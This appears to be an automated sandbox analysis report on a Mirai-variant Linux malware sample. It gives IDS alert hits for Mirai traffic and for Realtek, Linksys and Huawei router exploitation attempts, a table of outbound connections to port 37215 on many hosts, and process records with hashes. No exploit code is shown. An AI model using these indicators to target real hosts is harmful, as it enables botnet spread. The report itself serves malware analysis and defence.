                192.168.2.2395.234.230.9448464802027121 05/14/22-02:12:07.069322TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4846480192.168.2.2395.234.230.94
                192.168.2.2395.216.174.17949448802027121 05/14/22-02:12:38.394262TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4944880192.168.2.2395.216.174.179
                192.168.2.2395.65.7.17256166802027121 05/14/22-02:12:41.092384TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5616680192.168.2.2395.65.7.172
                192.168.2.23156.225.158.444432528692027339 05/14/22-02:13:11.398903TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4443252869192.168.2.23156.225.158.4
                192.168.2.2395.128.47.6334392802027121 05/14/22-02:11:57.648436TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3439280192.168.2.2395.128.47.63
                192.168.2.2388.250.14.12748664802027121 05/14/22-02:12:43.303856TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4866480192.168.2.2388.250.14.127
                192.168.2.2395.82.129.19756414802027121 05/14/22-02:12:48.726937TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5641480192.168.2.2395.82.129.197
                192.168.2.2395.100.32.17844040802027121 05/14/22-02:12:38.583388TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4404080192.168.2.2395.100.32.178
                192.168.2.2341.182.106.16151982528692027339 05/14/22-02:12:34.004298TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5198252869192.168.2.2341.182.106.161
                192.168.2.23156.226.87.24057702528692027339 05/14/22-02:12:14.078724TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5770252869192.168.2.23156.226.87.240
                192.168.2.23156.250.28.8451218528692027339 05/14/22-02:12:30.163455TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5121852869192.168.2.23156.250.28.84
                192.168.2.2388.221.178.11839856802027121 05/14/22-02:13:20.399630TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3985680192.168.2.2388.221.178.118
                192.168.2.2395.219.228.15941954802027121 05/14/22-02:13:26.255296TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4195480192.168.2.2395.219.228.159
                192.168.2.23172.65.103.5337110555552027153 05/14/22-02:13:39.278904TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3711055555192.168.2.23172.65.103.53
                192.168.2.2395.179.136.2934744802027121 05/14/22-02:12:36.319934TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3474480192.168.2.2395.179.136.29
                192.168.2.2395.35.24.8941260802027121 05/14/22-02:12:33.761799TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4126080192.168.2.2395.35.24.89
                192.168.2.2395.130.28.14846038802027121 05/14/22-02:12:25.946869TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4603880192.168.2.2395.130.28.148
                192.168.2.23172.65.247.10835834555552027153 05/14/22-02:11:56.029720TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3583455555192.168.2.23172.65.247.108
                192.168.2.2395.100.78.1757512802027121 05/14/22-02:12:36.286426TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5751280192.168.2.2395.100.78.17
                192.168.2.23156.226.101.14858192528692027339 05/14/22-02:13:26.890663TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5819252869192.168.2.23156.226.101.148
                192.168.2.2395.214.217.5141366802027121 05/14/22-02:11:58.000914TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4136680192.168.2.2395.214.217.51
                192.168.2.2395.223.112.7048866802027121 05/14/22-02:12:12.320419TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4886680192.168.2.2395.223.112.70
                192.168.2.2395.142.206.19256690802027121 05/14/22-02:13:14.627398TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5669080192.168.2.2395.142.206.192
                192.168.2.2395.110.252.1742942802027121 05/14/22-02:11:57.661872TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4294280192.168.2.2395.110.252.17
                192.168.2.23172.65.66.17232904555552027153 05/14/22-02:13:28.458438TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3290455555192.168.2.23172.65.66.172
                192.168.2.2395.101.105.3756486802027121 05/14/22-02:12:16.042664TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5648680192.168.2.2395.101.105.37
                192.168.2.2395.100.75.16236528802027121 05/14/22-02:12:01.373649TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3652880192.168.2.2395.100.75.162
                192.168.2.23156.226.61.6434088528692027339 05/14/22-02:12:33.965935TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3408852869192.168.2.23156.226.61.64
                192.168.2.23156.244.118.3341258528692027339 05/14/22-02:13:12.911524TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4125852869192.168.2.23156.244.118.33
                192.168.2.2395.120.26.12140584802027121 05/14/22-02:12:28.116129TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4058480192.168.2.2395.120.26.121
                192.168.2.2395.159.60.13046212802027121 05/14/22-02:12:21.738119TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4621280192.168.2.2395.159.60.130
                192.168.2.2395.144.20.16144268802027121 05/14/22-02:13:26.124337TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4426880192.168.2.2395.144.20.161
                192.168.2.2395.100.51.21344342802027121 05/14/22-02:12:36.297626TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4434280192.168.2.2395.100.51.213
                192.168.2.23172.65.3.22346802555552027153 05/14/22-02:11:51.219645TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4680255555192.168.2.23172.65.3.223
                192.168.2.2395.154.250.9959566802027121 05/14/22-02:12:18.483021TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5956680192.168.2.2395.154.250.99
                192.168.2.23172.65.43.20237380555552027153 05/14/22-02:12:26.237883TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3738055555192.168.2.23172.65.43.202
                192.168.2.2395.59.51.16444564802027121 05/14/22-02:12:09.948969TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4456480192.168.2.2395.59.51.164
                192.168.2.23197.148.89.3543430372152835222 05/14/22-02:11:47.945469TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4343037215192.168.2.23197.148.89.35
                192.168.2.23172.65.54.19344722555552027153 05/14/22-02:13:28.810687TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4472255555192.168.2.23172.65.54.193
                192.168.2.2395.159.46.8743460802027121 05/14/22-02:11:49.354543TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4346080192.168.2.2395.159.46.87
                192.168.2.2395.216.160.19341248802027121 05/14/22-02:11:52.570919TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4124880192.168.2.2395.216.160.193
                192.168.2.23172.65.46.1047160555552027153 05/14/22-02:12:20.938865TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4716055555192.168.2.23172.65.46.10
                192.168.2.2395.156.55.12440254802027121 05/14/22-02:12:33.801748TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4025480192.168.2.2395.156.55.124
                192.168.2.23172.65.32.10158782555552027153 05/14/22-02:13:15.170260TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5878255555192.168.2.23172.65.32.101
                192.168.2.2395.100.6.21858038802027121 05/14/22-02:12:07.025093TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5803880192.168.2.2395.100.6.218
                192.168.2.23172.247.6.5849348555552027153 05/14/22-02:13:28.793318TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4934855555192.168.2.23172.247.6.58
                TimestampSource PortDest PortSource IPDest IP
                May 14, 2022 02:11:43.852212906 CEST3608737215192.168.2.23197.71.249.223
                May 14, 2022 02:11:43.852226019 CEST3608737215192.168.2.23197.50.163.183
                May 14, 2022 02:11:43.852493048 CEST3608737215192.168.2.23197.120.164.221
                May 14, 2022 02:11:43.852500916 CEST3608737215192.168.2.23197.161.139.231
                May 14, 2022 02:11:43.852504015 CEST3608737215192.168.2.23197.176.129.73
                May 14, 2022 02:11:43.852529049 CEST3608737215192.168.2.23197.202.224.34
                May 14, 2022 02:11:43.852574110 CEST3608737215192.168.2.23197.174.71.85
                May 14, 2022 02:11:43.852586985 CEST3608737215192.168.2.23197.140.69.244
                May 14, 2022 02:11:43.852596998 CEST3608737215192.168.2.23197.183.140.121
                May 14, 2022 02:11:43.852642059 CEST3608737215192.168.2.23197.80.175.154
                May 14, 2022 02:11:43.852646112 CEST3608737215192.168.2.23197.195.177.70
                May 14, 2022 02:11:43.852649927 CEST3608737215192.168.2.23197.180.136.59
                May 14, 2022 02:11:43.852653027 CEST3608737215192.168.2.23197.47.193.131
                May 14, 2022 02:11:43.852658987 CEST3608737215192.168.2.23197.138.198.220
                May 14, 2022 02:11:43.852663040 CEST3608737215192.168.2.23197.133.224.147
                May 14, 2022 02:11:43.852663994 CEST3608737215192.168.2.23197.185.83.175
                May 14, 2022 02:11:43.852669001 CEST3608737215192.168.2.23197.37.169.30
                May 14, 2022 02:11:43.852670908 CEST3608737215192.168.2.23197.33.57.180
                May 14, 2022 02:11:43.852679968 CEST3608737215192.168.2.23197.228.131.62
                May 14, 2022 02:11:43.852680922 CEST3608737215192.168.2.23197.126.175.118
                May 14, 2022 02:11:43.852684975 CEST3608737215192.168.2.23197.40.251.106
                May 14, 2022 02:11:43.852685928 CEST3608737215192.168.2.23197.232.198.99
                May 14, 2022 02:11:43.852686882 CEST3608737215192.168.2.23197.11.39.246
                May 14, 2022 02:11:43.852688074 CEST3608737215192.168.2.23197.93.91.51
                May 14, 2022 02:11:43.852690935 CEST3608737215192.168.2.23197.147.5.250
                May 14, 2022 02:11:43.852694035 CEST3608737215192.168.2.23197.140.219.27
                May 14, 2022 02:11:43.852695942 CEST3608737215192.168.2.23197.51.21.7
                May 14, 2022 02:11:43.852699995 CEST3608737215192.168.2.23197.69.89.162
                May 14, 2022 02:11:43.852706909 CEST3608737215192.168.2.23197.51.178.46
                May 14, 2022 02:11:43.852710009 CEST3608737215192.168.2.23197.138.238.6
                May 14, 2022 02:11:43.852713108 CEST3608737215192.168.2.23197.124.18.175
                May 14, 2022 02:11:43.852715969 CEST3608737215192.168.2.23197.104.143.162
                May 14, 2022 02:11:43.852741957 CEST3608737215192.168.2.23197.229.146.204
                May 14, 2022 02:11:43.852754116 CEST3608737215192.168.2.23197.226.39.74
                May 14, 2022 02:11:43.852762938 CEST3608737215192.168.2.23197.163.223.43
                May 14, 2022 02:11:43.852766991 CEST3608737215192.168.2.23197.255.104.118
                May 14, 2022 02:11:43.852771997 CEST3608737215192.168.2.23197.224.168.3
                May 14, 2022 02:11:43.852771997 CEST3608737215192.168.2.23197.32.253.105
                May 14, 2022 02:11:43.852777958 CEST3608737215192.168.2.23197.182.181.107
                May 14, 2022 02:11:43.852782011 CEST3608737215192.168.2.23197.134.123.184
                May 14, 2022 02:11:43.852786064 CEST3608737215192.168.2.23197.14.50.78
                May 14, 2022 02:11:43.852792978 CEST3608737215192.168.2.23197.35.168.165
                May 14, 2022 02:11:43.852794886 CEST3608737215192.168.2.23197.82.180.60
                May 14, 2022 02:11:43.852794886 CEST3608737215192.168.2.23197.153.127.201
                May 14, 2022 02:11:43.852799892 CEST3608737215192.168.2.23197.78.154.198
                May 14, 2022 02:11:43.852803946 CEST3608737215192.168.2.23197.254.172.58
                May 14, 2022 02:11:43.852848053 CEST3608737215192.168.2.23197.72.207.173
                May 14, 2022 02:11:43.852855921 CEST3608737215192.168.2.23197.227.139.19
                May 14, 2022 02:11:43.852858067 CEST3608737215192.168.2.23197.213.249.182
                May 14, 2022 02:11:43.852864981 CEST3608737215192.168.2.23197.186.42.81
                May 14, 2022 02:11:43.852866888 CEST3608737215192.168.2.23197.46.20.4
                May 14, 2022 02:11:43.852870941 CEST3608737215192.168.2.23197.7.22.172
                May 14, 2022 02:11:43.852871895 CEST3608737215192.168.2.23197.244.116.184
                May 14, 2022 02:11:43.852875948 CEST3608737215192.168.2.23197.106.95.45
                May 14, 2022 02:11:43.852881908 CEST3608737215192.168.2.23197.234.164.115
                May 14, 2022 02:11:43.852889061 CEST3608737215192.168.2.23197.232.144.103
                May 14, 2022 02:11:43.852895975 CEST3608737215192.168.2.23197.166.46.206
                May 14, 2022 02:11:43.852905035 CEST3608737215192.168.2.23197.193.64.49
                May 14, 2022 02:11:43.852911949 CEST3608737215192.168.2.23197.200.82.30
                May 14, 2022 02:11:43.852911949 CEST3608737215192.168.2.23197.10.147.69
                May 14, 2022 02:11:43.852915049 CEST3608737215192.168.2.23197.137.20.164
                May 14, 2022 02:11:43.852921963 CEST3608737215192.168.2.23197.180.47.100
                May 14, 2022 02:11:43.852925062 CEST3608737215192.168.2.23197.245.185.191
                May 14, 2022 02:11:43.852927923 CEST3608737215192.168.2.23197.84.229.134
                May 14, 2022 02:11:43.852932930 CEST3608737215192.168.2.23197.75.98.121
                May 14, 2022 02:11:43.852937937 CEST3608737215192.168.2.23197.202.175.101
                May 14, 2022 02:11:43.852947950 CEST3608737215192.168.2.23197.236.147.202
                May 14, 2022 02:11:43.852950096 CEST3608737215192.168.2.23197.244.148.141
                May 14, 2022 02:11:43.852956057 CEST3608737215192.168.2.23197.153.228.243
                May 14, 2022 02:11:43.852958918 CEST3608737215192.168.2.23197.200.43.103
                May 14, 2022 02:11:43.852957964 CEST3608737215192.168.2.23197.217.170.46
                May 14, 2022 02:11:43.852963924 CEST3608737215192.168.2.23197.90.35.91
                May 14, 2022 02:11:43.852967024 CEST3608737215192.168.2.23197.120.152.171
                May 14, 2022 02:11:43.852969885 CEST3608737215192.168.2.23197.103.196.80
                May 14, 2022 02:11:43.852973938 CEST3608737215192.168.2.23197.238.156.47
                May 14, 2022 02:11:43.852977991 CEST3608737215192.168.2.23197.213.221.189
                May 14, 2022 02:11:43.852977991 CEST3608737215192.168.2.23197.72.77.134
                May 14, 2022 02:11:43.852981091 CEST3608737215192.168.2.23197.132.44.207
                May 14, 2022 02:11:43.852981091 CEST3608737215192.168.2.23197.89.20.218
                May 14, 2022 02:11:43.852982044 CEST3608737215192.168.2.23197.125.237.107
                May 14, 2022 02:11:43.852982044 CEST3608737215192.168.2.23197.40.79.74
                May 14, 2022 02:11:43.852983952 CEST3608737215192.168.2.23197.121.143.57
                May 14, 2022 02:11:43.852987051 CEST3608737215192.168.2.23197.28.51.24
                May 14, 2022 02:11:43.852988958 CEST3608737215192.168.2.23197.217.19.5
                May 14, 2022 02:11:43.852992058 CEST3608737215192.168.2.23197.226.72.148
                May 14, 2022 02:11:43.852992058 CEST3608737215192.168.2.23197.16.62.175
                May 14, 2022 02:11:43.852994919 CEST3608737215192.168.2.23197.110.58.166
                May 14, 2022 02:11:43.853008032 CEST3608737215192.168.2.23197.214.23.182
                May 14, 2022 02:11:43.853012085 CEST3608737215192.168.2.23197.206.62.232
                May 14, 2022 02:11:43.853015900 CEST3608737215192.168.2.23197.124.22.206
                May 14, 2022 02:11:43.853018999 CEST3608737215192.168.2.23197.184.140.81
                May 14, 2022 02:11:43.853020906 CEST3608737215192.168.2.23197.250.210.57
                May 14, 2022 02:11:43.853024006 CEST3608737215192.168.2.23197.136.52.80
                May 14, 2022 02:11:43.853028059 CEST3608737215192.168.2.23197.124.1.248
                May 14, 2022 02:11:43.853032112 CEST3608737215192.168.2.23197.6.126.211
                May 14, 2022 02:11:43.853034973 CEST3608737215192.168.2.23197.102.183.254
                May 14, 2022 02:11:43.853040934 CEST3608737215192.168.2.23197.205.107.207
                May 14, 2022 02:11:43.853051901 CEST3608737215192.168.2.23197.111.221.67
                May 14, 2022 02:11:43.853054047 CEST3608737215192.168.2.23197.218.223.114
                May 14, 2022 02:11:43.853065968 CEST3608737215192.168.2.23197.190.240.70
                • 192.168.0.14:80
                • 127.0.0.1:80

                System Behavior

                Start time:02:11:43
                Start date:14/05/2022
                Path:/tmp/qJlf2SjoW4
                Arguments:/tmp/qJlf2SjoW4
                File size:4139976 bytes
                MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                Start time:02:11:43
                Start date:14/05/2022
                Path:/tmp/qJlf2SjoW4
                Arguments:n/a
                File size:4139976 bytes
                MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                Start time:02:11:43
                Start date:14/05/2022
                Path:/tmp/qJlf2SjoW4
                Arguments:n/a
                File size:4139976 bytes
                MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                Start time:02:11:43
                Start date:14/05/2022
                Path:/tmp/qJlf2SjoW4
                Arguments:n/a
                File size:4139976 bytes
                MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                Start time:02:11:43
                Start date:14/05/2022
                Path:/tmp/qJlf2SjoW4
                Arguments:n/a
                File size:4139976 bytes
                MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                Start time:02:11:43
                Start date:14/05/2022
                Path:/tmp/qJlf2SjoW4
                Arguments:n/a
                File size:4139976 bytes
                MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                Start time:02:11:43
                Start date:14/05/2022
                Path:/tmp/qJlf2SjoW4
                Arguments:n/a
                File size:4139976 bytes
                MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                Start time:02:11:43
                Start date:14/05/2022
                Path:/tmp/qJlf2SjoW4
                Arguments:n/a
                File size:4139976 bytes
                MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                Start time:02:11:43
                Start date:14/05/2022
                Path:/tmp/qJlf2SjoW4
                Arguments:n/a
                File size:4139976 bytes
                MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                Start time:02:11:43
                Start date:14/05/2022
                Path:/tmp/qJlf2SjoW4
                Arguments:n/a
                File size:4139976 bytes
                MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                Start time:02:13:01
                Start date:14/05/2022
                Path:/usr/libexec/gnome-session-binary
                Arguments:n/a
                File size:334664 bytes
                MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb
                Start time:02:13:01
                Start date:14/05/2022
                Path:/bin/sh
                Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                Start time:02:13:01
                Start date:14/05/2022
                Path:/usr/libexec/gsd-print-notifications
                Arguments:/usr/libexec/gsd-print-notifications
                File size:51840 bytes
                MD5 hash:71539698aa691718cee775d6b9450ae2
                Start time:02:13:01
                Start date:14/05/2022
                Path:/usr/libexec/gsd-print-notifications
                Arguments:n/a
                File size:51840 bytes
                MD5 hash:71539698aa691718cee775d6b9450ae2
                Start time:02:13:01
                Start date:14/05/2022
                Path:/usr/libexec/gsd-print-notifications
                Arguments:n/a
                File size:51840 bytes
                MD5 hash:71539698aa691718cee775d6b9450ae2
                Start time:02:13:01
                Start date:14/05/2022
                Path:/usr/libexec/gsd-printer
                Arguments:/usr/libexec/gsd-printer
                File size:31120 bytes
                MD5 hash:7995828cf98c315fd55f2ffb3b22384d
                Start time:02:13:33
                Start date:14/05/2022
                Path:/usr/bin/xfce4-session
                Arguments:n/a
                File size:264752 bytes
                MD5 hash:648919f03ad356720c8c27f5aaaf75d1
                Start time:02:13:33
                Start date:14/05/2022
                Path:/usr/bin/rm
                Arguments:rm -f /home/saturnino/.cache/sessions/Thunar-2ec9153f1-6fa0-4067-96b1-e5fe875b1e51
                File size:72056 bytes
                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b